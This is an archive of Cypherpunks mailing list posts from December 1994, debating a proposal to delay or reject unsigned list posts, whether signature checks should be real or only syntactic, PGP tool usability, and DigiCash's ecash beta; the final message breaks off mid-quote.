From jamesd at netcom.com Thu Dec 1 00:04:34 1994
From: jamesd at netcom.com (James A. Donald)
Date: Thu, 1 Dec 94 00:04:34 PST
Subject: Warm, fuzzy, misleading feelings
In-Reply-To: <199412010119.RAA06900@python>
Message-ID: <199412010805.AAA27330@netcom16.netcom.com>

-----BEGIN PGP SIGNED MESSAGE-----

Dr. D.C. Williams writes
> By the same token, I don't see how this proposal does much to spread
> the Good Word. Maybe the sole intent is for the participants to share
> in the warm, fuzzy feelings of "doing their part". Like flying a kite
> for peace

Actually it is even worse than that: It is like wearing red
ribbons to protest AIDS.

A checker that checked signatures for consistent ID would
actually promote cryptography.

A checker that merely checks if a signature looks like
a signature merely makes cryptography look stupid, like
a power ranger suit.

I would entirely support a real checker, but not a toy checker.

-----BEGIN PGP SIGNATURE-----
Version: 7.9ui

We have the right to defend ourselves and our
property, because of the kind of animals that we    James A. Donald
are. True law derives from this right, not from
the arbitrary power of the omnipotent state.        jamesd at netcom.com
-----END PGP SIGNATURE-----

From mccoy at io.com Thu Dec 1 01:25:18 1994
From: mccoy at io.com (Jim McCoy)
Date: Thu, 1 Dec 94 01:25:18 PST
Subject: New cypherpunks motto...
Message-ID: <199412010925.DAA05528@pentagon.io.com>

Cypherpunks don't write code, they just bitch and moan about actually
using it...

jim

From tcmay at netcom.com Thu Dec 1 01:57:25 1994
From: tcmay at netcom.com (Timothy C. May)
Date: Thu, 1 Dec 94 01:57:25 PST
Subject: Warm, fuzzy, misleading feelings
In-Reply-To: <199412010805.AAA27330@netcom16.netcom.com>
Message-ID: <199412010957.BAA23404@netcom3.netcom.com>

James A. Donald wrote:

(the topic being using ersatz sigs to defeat the sig inspector)

> Actually it is even worse than that: It is like wearing red
> ribbons to protest AIDS.
>
> A checker that checked signatures for consistent ID would
> actually promote cryptography.
>
> A checker that merely checks if a signature looks like
> a signature merely makes cryptography look stupid, like
> a power ranger suit.

I'm back in agreement with James Donald (Chomsky is spinning).

More than just making crypto look stupid, a game to be played, this
whole "toad will only check that the _form_ of crypto is sort of
present" (caveat: this is short-hand for the case presented) defeats
the whole purpose of user-to-user verification.

I'm interested in systems which actually allow me to _really verify_
sigs if I have to (not often, I hope, and expect), not get a casual
comment from another system/user that it "appears" that a sig is
attached.

I wasn't kidding earlier today (apologies that I'm reading the later
mail first, as I just got home) when I argued that toad messages ought
to be signed. That is, all traffic from toad.

If sigs are to be compelled (Note to Eric on a point he made earlier:
a compelled sig is one which is compulsory if a post is not to be
bounced, as per Eric's message about delaying and then eventually
bouncing unsigned messages), which I consider unwise, then such sigs
should *actually be checked*, with the resulting checked messages then
signed by toad/Eric/Hugh/John/whatever.

Anything less than this is actually counterproductive, as it fosters a
non-Cypherpunkish view of placing trust in others to do what
technology allows one to do directly.

--Tim May

--
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay at netcom.com     | anonymous networks, digital pseudonyms, zero
408-688-5409           | knowledge, reputations, information markets,
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo at toad.com with body message of only:
subscribe cypherpunks.
FAQ available at ftp.netcom.com in pub/tcmay

From tcmay at netcom.com Thu Dec 1 02:22:16 1994
From: tcmay at netcom.com (Timothy C. May)
Date: Thu, 1 Dec 94 02:22:16 PST
Subject: Mandatory sig workaround
In-Reply-To: <199411302242.OAA11728@largo.remailer.net>
Message-ID: <199412011022.CAA24283@netcom3.netcom.com>

(I've returned from a day and evening away from this list to find, not
unexpectedly, a lot of acrimony. As I have to skim through so many
messages, it is my preference this early in the morning to comment
mostly on things I agree with, as I just did with James Donald. (Right
after posting on a point of agreement, I saw his negative reaction to
my points, and lack the energy right now to respond to them.))

Eric Hughes wrote:

>    As a side note, if you want people to sign their notes, why aren't you
>    doing so now?
>
> For the same reason that Tim isn't--it's too difficult.
>
> Now I've just recently set up a new email machine and I expect that
> I'll be able to get signing set up on it before the end of the year.
> I have plenty of irons in the fire already, and this isn't the top
> priority.

"Plenty of irons in the fire" is indeed the crucial point. Learning
how to make UQWK talk to AutoPGP in elm (or whatever) is apparently
fine for some people (by my estimate, 20% of those who post), but many
of the most valued (who shall remain nameless here) posters are *not*
signing posts. I urge you all to watch who signs and who doesn't.

Face it, some fraction of people on this list are gearheads, with
their own Pentiums or Suns sitting on the Net and with lots of
Unix/Linux tools they like to play with and that they can use to
compile their premails and procmails and whatnot. More power to them.

But many of us have "other irons in the fire" and don't plan anytime
soon to abandon our existing tools (in my case, a PowerMac 7100AV,
with video digitizers, etc., FrameMaker, Mathematica, SmalltalkAgents,
etc.) in favor of more PGP-friendly Unix boxes.

If people feel it would be better for the Cause if I eschewed writing
on the issues I write about in favor of not writing, presenting, etc.,
and instead becoming a Unix gearhead, able to transparently sign all
messages, then send your comments to me.

>    it would seem that signing
>    your own messages would be a good way of starting things toward the
>    direction you want to go.
>
> It certainly would. My priorities on this are to get myself set up
> for signing. Then I need to get a recognizer written, then to hack
> vacation to use alternate database files, then to get my own personal
> resource list compiled, then to set my personal nagware. Only after
> all that do I intend to alter the list.

And I intend to do none of this, choosing to focus on other things,
which is why I object to policies designed to modify behavior in the
way being discussed in this recent thread.

--Tim May

--
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay at netcom.com     | anonymous networks, digital pseudonyms, zero
408-688-5409           | knowledge, reputations, information markets,
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo at toad.com with body message of only:
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tcmay

From tcmay at netcom.com Thu Dec 1 02:53:26 1994
From: tcmay at netcom.com (Timothy C. May)
Date: Thu, 1 Dec 94 02:53:26 PST
Subject: "Cyherpunks Named Official Signing Authority"
In-Reply-To: <199412010052.QAA11972@largo.remailer.net>
Message-ID: <199412011053.CAA25543@netcom3.netcom.com>

Eric Hughes wrote:

>
>    From: tcmay at netcom.com (Timothy C. May)
>
>    If the intent of a "Compelled Signature" (tm) policy [...]
>
> Putting it in quotes doesn't prevent it from being a misrepresentation.
>
> Are you saying that adding notifications and delays is compulsion, or
> not?

First of all, I am generally commenting on this:

"I am still considering the "sign-or-delay" proposal for the toad.com
server, that is, sign your articles to the list or they'll be delayed
and eventually rejected." [Eric Hughes, 1994-11-28]

"Eventually rejected" means to me that unsigned messages will not be
passed through to the list. I call this a "compelled signature" in
that the signature is compulsory, not optional.

(We hopefully can avoid splitting semantic hairs about what
"compelled" or "compulsory" means. A Driver's License is compulsory to
drive, though one is free not to drive. If the "eventually rejected"
situation is reached, then a digital sig is compelled in this sense;
that one is free to leave the list or not to write posts does not
significantly change this compulsory or compelled nature.)

>    Imagine the P.R. value to these Net.Cops: "But even the Cypherpunks
>    require all posts to be signed!."
>
> If the net cops are going to acknowledge a merit in a cypherpunks
> position, I say let them. The opportunity to educate the other
> listeners that signatures are not the same as personal identity is an
> opportunity not to be missed, especially when your opponent hands it
> to you.

I strongly disagree with this. If a "Cypherpunks position" happens to
be wrong (as many of us think is the case with this "sign your posts
or face delay and, eventually, rejection"), then it is not
automatically good that Net.Cops see it and respond to it.

I say a system which sets up a person or site as arbiter of what is
signed and what is not is counterproductive to our goals. It plays
into the hands of those who wish to ban anonymous posts.

(Clearly I am not saying that the Hughes proposal is a plan to ban
anonymous posts, only that the "all posts should be signed" notion is
very similar to Net.Cop proposals to associate all posts with personal
identity.
That the latest explication of the Hughes proposal says that the
emphasis will be on _syntactic_ checking, and not actual verification,
is a subtlety far beyond the Net.Cops who want real Signature
Authorities to validate Citizen-Units messages.)

In other messages this morning I have made my points about
user-to-user verification being what is important.

--Tim May

--
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay at netcom.com     | anonymous networks, digital pseudonyms, zero
408-688-5409           | knowledge, reputations, information markets,
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo at toad.com with body message of only:
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tcmay

From tcmay at netcom.com Thu Dec 1 03:09:26 1994
From: tcmay at netcom.com (Timothy C. May)
Date: Thu, 1 Dec 94 03:09:26 PST
Subject: We are ALL guests (except Eric)
In-Reply-To: <3bj4m6$r4a@bb.hks.net>
Message-ID: <199412011109.DAA26184@netcom3.netcom.com>

L. Todd Masco wrote:

> Tim's come out strongly against the proposal, as has James. As far
> as I can see, Tim's the only one that's raised the stakes to the
> ultimatum, "Do it and I leave" (although it's not clear whether he means
> the rejection or the slowdown of unsigned posts, and whether he'd instead
> decide to use an auto-signing service. Tim?)
                                         ^^^^

I have no idea about these "auto-signing services." My inclination
would be not to use them, as I rarely engage in "workarounds" to deal
with situations where speed bumps have been placed in my way.

If it's just a few minutes delay, who cares? If it's a few hours, I'll
likely bombard the list with "Has anybody seen the message I posted?"
messages. (There is no rule against this, so I expect to do this.)
If my messages are delayed by many hours or days, then it is the same
as if they had been rejected...participation in threads is ended. (I
think Jamie Lawrence made similar points, when he/she (I forget which)
made the point about minutes-hours-days being a tough issue.)

I haven't said I plan to leave the list. I've said that if my posts
are blocked/bounced/rejected, I would likely choose not to remain.
(Reference to "I am still considering the "sign-or-delay" proposal for
the toad.com server, that is, sign your articles to the list or
they'll be delayed and eventually rejected." [Eric Hughes, 1994-11-28])

I will register a note of purely personal frustration that many have
framed the current debate in terms of "Eric's list" and "If Eric wants
to do it this way, then this is how it should be done," etc. I have no
animosity toward Eric, but think this is a misguided rewriting of
history.

--Tim May

--
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay at netcom.com     | anonymous networks, digital pseudonyms, zero
408-688-5409           | knowledge, reputations, information markets,
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo at toad.com with body message of only:
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tcmay

From tcmay at netcom.com Thu Dec 1 03:10:26 1994
From: tcmay at netcom.com (Timothy C. May)
Date: Thu, 1 Dec 94 03:10:26 PST
Subject: We are ALL guests (except Eric)
In-Reply-To: <199412010039.QAA09228@netcom10.netcom.com>
Message-ID: <199412011110.DAA26299@netcom3.netcom.com>

James A. Donald wrote:

>
> Timothy C. May writes
> > I rarely argue in terms of
> > justice and fairness, so please don't imply that I have done so.
>
> Look at the title of this thread. If what you say is true,
> you would not have responded to this thread.
> The title would be meaningless or irrelevant to you.

Huh?

--
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay at netcom.com     | anonymous networks, digital pseudonyms, zero
408-688-5409           | knowledge, reputations, information markets,
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo at toad.com with body message of only:
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tcmay

From tcmay at netcom.com Thu Dec 1 03:28:18 1994
From: tcmay at netcom.com (Timothy C. May)
Date: Thu, 1 Dec 94 03:28:18 PST
Subject: Effects of Marking/Delaying Nonsigned Posts
In-Reply-To: <199412010320.TAA12195@largo.remailer.net>
Message-ID: <199412011128.DAA27458@netcom3.netcom.com>

Eric Hughes wrote:

> This afternoon I considered starting the initial delay at one minute
> and incrementing the delay by one minute each time a message gets
> delayed. Perhaps the increment would be 15 or 30 seconds--whatever.
> The point is that the delay would ease in slowly and folks would get a
> chance to adjust.

A concrete basis for comment. I post about 4 messages a day to the
Cypherpunks list. Many others post less than 1 per day, some only 1
every week or so. (And so on.)

Effects on Active Posters (4 or so per day):

4 x 15 seconds = 1 minute after the first day
               = 30 minutes after the first month
               = 3 hours after the first 6 months
               = 6 hours after the first year

(Double these numbers if the "30 seconds" figure is used.)

Effects on Casual Posters:

2 per week x 15 seconds = 30 seconds after the first week
                        = 2 minutes after the first month
                        = 24 minutes after the first year

Pretty clearly, casual posters would not be significantly affected,
while active posters would be.

The desired intent? I doubt it. But typical of mechanistic attempts to
modify behavior. (Yes, seen on the Extropians list.)

--Tim May

--
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay at netcom.com     | anonymous networks, digital pseudonyms, zero
408-688-5409           | knowledge, reputations, information markets,
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo at toad.com with body message of only:
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tcmay

From tcmay at netcom.com Thu Dec 1 03:42:12 1994
From: tcmay at netcom.com (Timothy C. May)
Date: Thu, 1 Dec 94 03:42:12 PST
Subject: We are ALL guests (except Eric)
In-Reply-To: <199412010314.TAA12186@largo.remailer.net>
Message-ID: <199412011142.DAA28100@netcom3.netcom.com>

Eric Hughes wrote:

> I apply Tim's Calvinist Stoicism stance to this situation. Put
> crudely, if people bolt at the first sign of encroachment, fuck 'em.

Indeed. But if my messages are bounced or delayed excessively, I will
of course have no reason to remain. My own Calvinist Stoicism. I won't
jump through hoops to meet pointless syntactical purity checks.
Whether I sign all messages will depend on whether certain tools
become available and easily installable...at the current rate, I doubt
it (for me, Netcom, elm, etc.).

> This is both an advantage and a disadvantage. On one hand, harmony is
> maintained. (I hear the guffaws too.) On the other, the message
> isn't nearly as strong. To reiterate, I am willing to use my
                          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> position to send a stronger message.
  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Bluntly, Eric, this is what is so disturbing about your position. You
are willing to "use your position" to essentially purge the list
(through bounces, a la "sign your articles to the list or they'll be
delayed and eventually rejected") of many of us who are unlikely to
solve the various problems mentioned so many times here.
You don't sign, others of note don't sign (some that I can think of
right now: Gilmore, Finney, Zimmermann, and probably many others). You
are _planning_ to now begin working on getting your own signing
situation squared away, but many of us are on different schedules
(Hint: It's even lower on the list of things to do for me).

>    OTGH, pgp is a bigger
>    cycle-sucker than I necessarily want to have running all the time on our
>    poor little microVAXen.
>
> Yet another reason to have a less-than-fully secure key for that location.

I don't buy this, and hence will have my messages delayed or bounced.
I want my key to be useful for real uses, not just "Power Ranger" (a
la James Donald) uses.

--Tim May

--
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay at netcom.com     | anonymous networks, digital pseudonyms, zero
408-688-5409           | knowledge, reputations, information markets,
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo at toad.com with body message of only:
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tcmay

From emw at ima.com Thu Dec 1 04:34:57 1994
From: emw at ima.com (Ed Wilkinson)
Date: Thu, 1 Dec 94 04:34:57 PST
Subject: We are ALL guests (except Eric)
In-Reply-To: <199412011142.DAA28100@netcom3.netcom.com>
Message-ID: <9412021223.AA07163@ima.com>

Although I can see the reasons why it would be good to increase the
use of digsigs, I don't think it's worth the possibility that many
active members of this list will disappear. Even one would be too
many, as we need all the support we can get.

Sounds like an ideal challenge for somebody to massage the available
tools to come up with something that *is* easy and convenient to use
for signing messages, without compromising on security. It could even
use standard PGP keyrings.

Cypherpunks write code ...

Ed

--
Ed Wilkinson  emw at ima.com  IMA Ltd  Internet Email Gateways

From mark at unicorn.com Thu Dec 1 05:08:03 1994
From: mark at unicorn.com (Mark Grant)
Date: Thu, 1 Dec 94 05:08:03 PST
Subject: Hazards of encouraging forged dig sigs
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 30 Nov 1994, L. McCarthy wrote:

>Encouraging cryptographically
>valid signatures was the first suggestion I'd seen in this entire debate
>which seemed to promise tangible benefits; encouraging cryptographically
>invalid signatures is the first notion which appears to offer tangible
>detriment.

As one of the few people who verify all PGP signatures for which I
have keys, I have to say that encouraging people to put garbage in PGP
signature blocks would be extremely annoying. Either I'll have to go
back to using a non-PGP-aware mail reader, or fix it to do something
sensible with such messages. While I'm going to have to do the latter
at some point anyway, there are much more useful things that I could
be doing...

Mark

-----BEGIN PGP SIGNATURE-----
Version: 2.6
-----END PGP SIGNATURE-----

From roy at cybrspc.mn.org Thu Dec 1 05:46:58 1994
From: roy at cybrspc.mn.org (Roy M. Silvernail)
Date: Thu, 1 Dec 94 05:46:58 PST
Subject: Mandatory sig workaround
In-Reply-To: <199412011022.CAA24283@netcom3.netcom.com>
Message-ID: <941201.071127.7W2.rusnews.w165w@cybrspc.mn.org>

-----BEGIN PGP SIGNED MESSAGE-----

I'm not at all sure what to make of where this argument is going.

Tim May writes:

> "Plenty of irons in the fire" is indeed the crucial point.
> Learning how to make UQWK talk to AutoPGP in elm (or whatever) is
> apparently fine for some people (by my estimate, 20% of those who
> post), but many of the most valued (who shall remain nameless here)
> posters are *not* signing posts. I urge you all to watch who signs
> and who doesn't.

It may just be that it's early and I'm only on my first cup of coffee,
but are you suggesting an inverse correlation between the quality of a
submission and the presence of a signature, Tim? While I'd agree that
many of the quality list members don't sign their articles, I don't
think I can make the leap that signed messages have no useful content.
Please tell me I misread you.

> Face it, some fraction of people on this list are gearheads, with
> their own Pentiums or Suns sitting on the Net and with lots of
> Unix/Linux tools they like to play with and that they can use to
> compile their premails and procmails and whatnot. More power to them.

Or perhaps just a lowly 486 running DOS and UUCP. But I heard that
Cypherpunks Write Code, so I wrote PGP support into my signature
controller. I have signed all my email for 2 years, and all net
traffic for nearly a year. Gearhead? Perhaps I am. But this ain't no
Porsche.

> But many of us have "other irons in the fire" and don't plan anytime
> soon to abandon our existing tools (in my case, a PowerMac 7100AV,
> with video digitizers, etc., FrameMaker, Mathematica, SmalltalkAgents,
> etc.) in favor of more PGP-friendly Unix boxes.

Which only underscores the need for better tools for the existing
platforms. Yes, I'd like everyone to sign their traffic. But it's not
always possible when the tools to do that are either nonexistent or
arcane (which means I'm in agreement with Tim on why he doesn't sign
his traffic).

> And I intend to do none of this, choosing to focus on other things,
> which is why I object to policies designed to modify behavior in the
> way being discussed in this recent thread.

Tim, just for fun, what tools would need to appear to make it possible
for you to sign your traffic? Maybe a description will inspire some of
the Macheads out there to get hacking. (the astute reader will note
that I'm not suggesting new tools to the erstwhile Mr. May, as has
been done so often in the past)

- --
More mindless typing exercise from roy at cybrspc.mn.org
"Usenet is like a herd of performing elephants with diarrhea -- massive,
difficult to redirect, awe-inspiring, entertaining, and a source of
mind-boggling amounts of excrement when you least expect it."--Gene Spafford

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1
-----END PGP SIGNATURE-----

From shamrock at netcom.com Thu Dec 1 07:39:56 1994
From: shamrock at netcom.com (Lucky Green)
Date: Thu, 1 Dec 94 07:39:56 PST
Subject: [Bay Area] Meet the Ecash developers today
Message-ID: <199412011540.HAA26971@netcom18.netcom.com>

The folks from DigiCash are demonstrating Ecash, smartcard payment
systems, and other goodies at the Cardtech West exhibition in the
Santa Clara convention center. Today, Thursday, is the last day of the
show, so get on out there. The show will be open from 10 am through
3 pm.

No, Chaum himself won't be there.

-- Lucky Green  PGP encrypted mail preferred.
"The very atmosphere of firearms anywhere and everywhere restrains
evil interference - they deserve a place of honor with all that's
good."

From perry at imsi.com Thu Dec 1 07:58:54 1994
From: perry at imsi.com (Perry E. Metzger)
Date: Thu, 1 Dec 94 07:58:54 PST
Subject: We are ALL guests (except Eric)
In-Reply-To:
Message-ID: <9412011558.AA03114@snark.imsi.com>

Jonathan Rochkind says:

> If me and my friends don't like coke, we can't copy their secret formula
> and sell something in a red can with a white curve down the side and
> "Coca-cola" written on it in cursive lettering. We'll be in court in about
> four minutes.
>
> If me and my friends don't like the cypherpunks list, we can start our own
> list called "cypherpunks." We can even get the list of subscribers from
> toad (it's public information), and subscribe them all to our list,
> although they might not appreciate it so much.

A person buys a building and places a nightclub within. By your logic,
he does not own the nightclub, because another person could open a
nightclub.

Were Eric to trademark "Cypherpunks" and use it in trade as the name
of a mailing list, you could NOT create another one for the same
reason you couldn't sell "Coke". The fact that Eric has no interest in
doing this and doesn't claim to own the name does not change the
situation.

.pm

From JLICQUIA at mhc.uiuc.edu Thu Dec 1 08:02:10 1994
From: JLICQUIA at mhc.uiuc.edu (JEFF LICQUIA (CEI))
Date: Thu, 1 Dec 94 08:02:10 PST
Subject: Mandatory sig workaround
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

> From: tcmay at netcom.com (Timothy C. May)

> Face it, some fraction of people on this list are gearheads, with
> their own Pentiums or Suns sitting on the Net and with lots of
> Unix/Linux tools they like to play with and that they can use to
> compile their premails and procmails and whatnot. More power to them.
>
> But many of us have "other irons in the fire" and don't plan anytime
> soon to abandon our existing tools (in my case, a PowerMac 7100AV,
> with video digitizers, etc., FrameMaker, Mathematica, SmalltalkAgents,
> etc.) in favor of more PGP-friendly Unix boxes.

Speaking as a "gearhead", I have a few observations...

[Proof of gearhead status: My post is signed. I'm writing under
Windows with an Ethernet to the world, using Pegasus Mail and PGPClip.
I've got the mouse movements memorized. I run Linux at home and
administer it at work, both with their own PGP and other k00l t00lz.
I have encrypted filesystems on some of my boxes. I'm working on two
personal projects directly spawned by this debate. None of my machines
are Pentiums, though; I must only be a junior gearhead. :-]

Considering our wonderful motto, "Cypherpunks write code", I'd say
that Tim's assessment of the situation is more an indictment than
anything else. Why the heck CAN'T Tim sign his posts easily despite
his limited connectivity? I grant that it's not anyone's
responsibility to take care of him for free; however, I can't see
advocating hard-to-use crypto as a solution to any of the problems
given here.

I don't know about the rest, but I treat Tim's statement above as a
personal challenge. (Go ahead. Just TRY to make me a package so easy
to use I'll have no excuse. Just TRY it!)

[Unfortunately, Tim, it's sad that you may not be able to benefit from
any of my results. I'm clueless about Mac code and have no way of
rectifying that; thus, my efforts are limited to Windows...]

ObSigs: Perhaps once the tools are written, Eric's proposals won't
seem so objectionable. If signing is just a matter of clicking and
typing a pass phrase (no matter what your particular environment is
like), then pushing sigs in this way doesn't seem like such a bad
thing. I don't think that encouraging/requiring sigs will encourage
net.cops to do anything that probably isn't a bad idea anyway, esp.
since we don't have an Official Cypherpunks Certifying Authority(tm).

> If people feel it would be better for the Cause if I eschewed writing
> on the issues I write about in favor of not writing, presenting, etc.,
> and instead becoming a Unix gearhead, able to transparently sign all
> messages, then send your comments to me.

Well, Tim, I personally don't mind you kicking your responsibility to
live up to the ol' motto and waste our time with your illuminating
discourse. :-)

[Before you flame me: The fact that you have reacted so angrily to the
above statement indicates your answer to Tim's question. Believe me,
the above is satire, and I would agree with you.]

I think there's a place both for the gearheads and the visionaries.
Sure, Tim doesn't contribute any code (generally!); on the other hand,
I don't remember contributing too much in the way of vision (or code,
for that matter :-). Maybe we should both get ourselves kicked off;
after all, some (Eric comes to mind) have done both...

[Eric here]
> > It certainly would. My priorities on this are to get myself set up
> > for signing. Then I need to get a recognizer written, then to hack
> > vacation to use alternate database files, then to get my own personal
> > resource list compiled, then to set my personal nagware. Only after
> > all that do I intend to alter the list.
>
> And I intend to do none of this, choosing to focus on other things,
> which is why I object to policies designed to modify behavior in the
> way being discussed in this recent thread.

As an aside, what would be a minimum standard for a usable enough
solution? [Besides persuading Qualcomm, Microsoft, and the rest to put
a "PGP" button in their mailers. I'm looking for an incremental step
that can be done without connections.]

An example of an idea I've had: Supposedly, Pegasus Mail for Windows
(a SMTP/POP3 and MHS/NetWare mailer) will soon have DDE and OLE
support. I'm thinking of a separate "PGP Shell for Pegasus" program
that would load and do its thing by controlling the mailer through DDE
(and maybe OLE). It would be a separate app (at least the DDE version
would), but it would at least have the "click and go" kind of ease of
use that I've heard people asking for.
I'm working on a prototype that will do the same for Programmer's File
Editor, a DDE-aware text editor (its only advantage: it's really here,
unlike the DDE-aware mailers...).

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

From eric at remailer.net Thu Dec 1 08:02:20 1994
From: eric at remailer.net (Eric Hughes)
Date: Thu, 1 Dec 94 08:02:20 PST
Subject: "Cyherpunks Named Official Signing Authority"
In-Reply-To: <199412011053.CAA25543@netcom3.netcom.com>
Message-ID: <199412011701.JAA13163@largo.remailer.net>

   From: tcmay at netcom.com (Timothy C. May)

   First of all, I am generally commenting on this:

   "I am still considering the "sign-or-delay" proposal for the toad.com
   server, that is, sign your articles to the list or they'll be delayed
   and eventually rejected." [Eric Hughes, 1994-11-28]

Tim, I've not been referring to that exact proposal for some time now.
In very specific detail, I have dropped the premise that they might be
rejected. This happened almost immediately after this recent
discussion began. I wanted to restrict discussion to what might be
implemented first to avoid the (alas, unavoided) less than productive
discussions about what could happen later.

Was I insufficiently clear that I was now discussing a smaller
proposal? What I see is that you are refusing (by omission) to address
the subject at hand. I see a direct, if not intentional, effort to
address something that is not what I have been talking about.

   "Eventually rejected" means to me that unsigned messages will not be
   passed through to the list. I call this a "compelled signature" in
   that the signature is compulsory, not optional.

This is all well and good, but it is on a different but related
subject. I ask again the question that I specifically asked before.
I'll even not abbreviate to be clear that I'm actually asking for two things.

Does a marking action by the server create a compulsion to sign?

Does a delay action by the server create a compulsion to sign?

Eric

From jrochkin at cs.oberlin.edu Thu Dec 1 08:07:04 1994
From: jrochkin at cs.oberlin.edu (Jonathan Rochkind)
Date: Thu, 1 Dec 94 08:07:04 PST
Subject: We are ALL guests (except Eric)
Message-ID:

perry at imsi.com wrote:
>Were Eric to trademark "Cypherpunks" and use it in trade as the name
>of a mailing list, you could NOT create another one for the same
>reason you couldn't sell "Coke". The fact that Eric has no interest in
>doing this and doesn't claim to own the name does not change the
>situation.

I think it does change the situation. I'm not even sure if Eric _could_ trademark the name "cypherpunks". Isn't there a requirement that it not be "common usage" or something at the time you copyright it? Assuming Eric could trademark the list, but just chooses not to, then what's to stop _me_ from getting a trademark on the name "cypherpunks" when I start my own competing list? If I started a competing list, named it cypherpunks (or better-cypherpunks, or whatever), and trademarked the name "cypherpunks", would that mean that I owned the cypherpunks list? Or would Eric still own it? Or would nobody own it?

Intellectual property is a tricky business, whether you are just looking at it from the legal perspective, or whether you are looking at it from an ethical or pragmatic perspective. And the issue of "ownership" of the cypherpunks list seems a particularly tricky instance of intellectual property, from a legal, ethical, or pragmatic point of view. It really doesn't seem to me that Eric "owns" cypherpunks in the same way I own my car, or even in the same way that Coca-cola "owns" the coke trademark, and the formula used to make coke beverage. There are some fundamental differences in what's going on.
Cypherpunks isn't so much a service being provided by Eric as it is a group undertaking by all of its participants. If Eric were to suddenly decide to become a buddhist monk and not have anything to do with cypherpunks anymore, and if John Gilmore were suddenly to decide not to allow the cypherpunks list on his machine, the list wouldn't cease to exist. It wouldn't even be hurt much at all. It would just move to a different machine, and get a new list administrator.

From andrew_loewenstern at il.us.swissbank.com Thu Dec 1 08:21:17 1994
From: andrew_loewenstern at il.us.swissbank.com (Andrew Lowenstern)
Date: Thu, 1 Dec 94 08:21:17 PST
Subject: Mandatory sig workaround
Message-ID: <9412011620.AA04944@ch1d157nwk>

Roy Silvernail writes:
> Tim, just for fun, what tools would need to appear to make it
> possible for you to sign your traffic? Maybe a description will
> inspire some of the Macheads out there to get hacking. (the astute
> reader will note that I'm not suggesting new tools to the erstwhile
> Mr. May, as has been done so often in the past)

Perhaps I'm wrong, but doesn't MacPGP allow you to sign things on the clipboard? Are there any MacPGP users out there? If this is true (and I think it is), then I don't see what's holding Tim back... Compose message, select all, cut, sign, paste, deliver...

andrew

From hfinney at shell.portal.com Thu Dec 1 08:27:12 1994
From: hfinney at shell.portal.com (Hal)
Date: Thu, 1 Dec 94 08:27:12 PST
Subject: Brands excluded from digicash beta
Message-ID: <199412011627.IAA14481@jobe.shell.portal.com>

-----BEGIN PGP SIGNED MESSAGE-----

Last month I complained that my multiple attempts to request an account to try out the digicash beta-test ecash system had been ignored. I got half a dozen replies from people who had had exactly the same experience. Shortly afterwards, though, I got email from digicash saying that my account would be activated in a few days. This was on Oct. 21, and I have heard nothing since then.
I just figured that I didn't have enough clout for them to bother to respond to me, but today on the www-buyinfo list, Stefan Brands, who many think has the best ecash technology available today, posted that he had had the same experience! Brands himself has still not been given an opportunity to join the beta test. He did not sound very happy about this.

I can see that Chaum and Brands are potential competitors to an extent; they both have or will soon have patents which will be necessary for efficient offline systems. But it is clear to me that some form of cross licensing is going to be necessary to have a really clear patent situation. Under the circumstances it seems silly for Chaum to antagonize such an important player in the game. Of course, it may well be a matter of incompetence rather than insult, but the net result is the same. The more I see of digicash's lack of consideration towards their potential customers and important figures like Brands the more I question whether they have the potential to succeed.

Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBLt35LhnMLJtOy9MBAQEyPwIA7gDKNK7T+vCp1I+YnUrsDb1sDhTWFO4T
olTEgTZnLtbQMLe70bNni2jjL0SShFqHRpSNZbsEPt0UAdmf5Pcf+A==
=MZXU
-----END PGP SIGNATURE-----

From jrochkin at cs.oberlin.edu Thu Dec 1 08:56:17 1994
From: jrochkin at cs.oberlin.edu (Jonathan Rochkind)
Date: Thu, 1 Dec 94 08:56:17 PST
Subject: Mandatory sig workaround
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

At 11:20 AM 12/01/94, Andrew Lowenstern wrote:
>Roy Silvernail writes:
>> Tim, just for fun, what tools would need to appear to make it
>> possible for you to sign your traffic? Maybe a description will
>> inspire some of the Macheads out there to get hacking. (the astute
>> reader will note that I'm not suggesting new tools to the erstwhile
>> Mr. May, as has been done so often in the past)
>
>Perhaps I'm wrong, but doesn't MacPGP allow you to sign things on the
>clipboard? Are there any MacPGP users out there? If this is true (and I
>think it is), then I don't see what's holding Tim back... Compose message,
>select all, cut, sign, paste, deliver...

